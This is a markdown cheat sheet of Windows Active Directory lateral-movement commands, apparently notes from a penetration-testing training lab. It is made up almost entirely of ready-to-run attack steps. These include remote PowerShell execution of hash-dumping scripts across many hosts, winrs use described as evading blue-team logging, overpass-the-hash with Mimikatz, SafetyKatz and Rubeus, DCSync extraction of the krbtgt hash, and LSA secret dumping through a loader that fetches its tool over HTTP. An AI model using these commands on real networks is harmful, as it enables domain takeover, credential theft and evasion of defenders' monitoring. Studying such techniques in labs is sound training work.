# LateralMovement ## Powershell Remoting PS Remoting is a feature in windows server just like ssh in linux where administrators can perform tasks on remote machines without having to physically be present at each machine. It uses Windows Remote Management(WinRM) port 5985 http and 5986 https. ## Command to enable PSRemoting ```powershell Enable-PSRemoting -Force ``` ## Command to enable PSRemoting on remote machine ```powershell wmic /node: process call create "powershell enable-psremoting -force" ``` ## IF we have administrative access on another machine after use hunting ```powershell Enter-PSSession dcorp-adminsrv ``` OR ```powershell $session = New-PSSession -ComputerName dcorp-adminsrv Enter-PSSession -Session $session ``` ## TO execute commands parallely on many machines If we have privilge to execute commands on many machines use below. Here create a file with names of computers to run commands on. ```powershell Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content ) ``` ## To execute scripts prallely on many machines Similarly as above create a file with names of computers/servers to run commands on. {% code overflow="wrap" %} ```powershell Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content ) ``` {% endcode %} ## To evade logging by blue team we can use winrs ```powershell winrs -remote: -u:server1\administrator -p:Pass@123 hostname ``` ## enable rdp access on another computer using scriptblock {% code overflow="wrap" %} ```powershell Invoke-Command -ScriptBlock {Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0 } -ComputerName dcorp-adminsrv ``` {% endcode %} ## Over Pass The Hash Here, the needed aes256key, rc4 hash all can be got using mimikatz or safetykatz. Here, overpass the hash using any of the below techniques uses logon type 9 which means running whoami still shows as student1 or default username but we can access the remote resource like the domain controller simply by doing `winrs -r:dcorp-dc cmd` ### Using Mimikatz( Needs elevation (Run as administrator)) {% code overflow="wrap" %} ```powershell Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256: /run:powershell.exe"' ``` {% endcode %} ### Using safetykatz( Needs elevation (Run as administrator)) {% code overflow="wrap" %} ```powershell SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256: /run:cmd.exe" "exit" ``` {% endcode %} ### Using BetterSafetyKatz {% code overflow="wrap" %} ```powershell BetterSafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256: /run:cmd.exe" "exit" ``` {% endcode %} ### Using rubeus(doesn't need elevation) ```batch Rubeus.exe asktgt /user:administrator /rc4: /ptt ``` ### Using rubeus(needs elevation) {% code overflow="wrap" %} ```powershell Rubeus.exe asktgt /user:administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt ``` {% endcode %} ## DCSync(Needs Domain Admin Privilege by default) DCSync is a late stage kill chain attack this means an attacker has hold of a user who has Active Directory Domain replication rights, domain replication is the method of updating objects from one DC to another DC and during this process the DC returns replication data to the requester including password hashes. ### DCSync to extract krbtgt hash for us domain ```powershell Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' ``` ### DCSync to extract krbtgt hash for us domain using safetykatz ```powershell SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" ``` ### DCSync to extract krbtgt hash using bettersafetykatz ```powershell BetterSafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit" ``` ## If above does not work use below to get NTLM hash not AES key. use "lsadump::lsa /patch" "exit" flag {% code overflow="wrap" %} ```powershell .\Loader.exe -path http://127.0.0.1:8080/BetterSafetyKatz.exe "lsadump::lsa /patch" "exit" ``` {% endcode %} ```powershell BetterSafetyKatz.exe "lsadump::lsa /patch" ``` ```powershell Invoke-Mimikatz -Command '"lsadump::lsa /patch"' ``` ```powershell SafetyKatz.exe "lsadump::lsa /patch" ```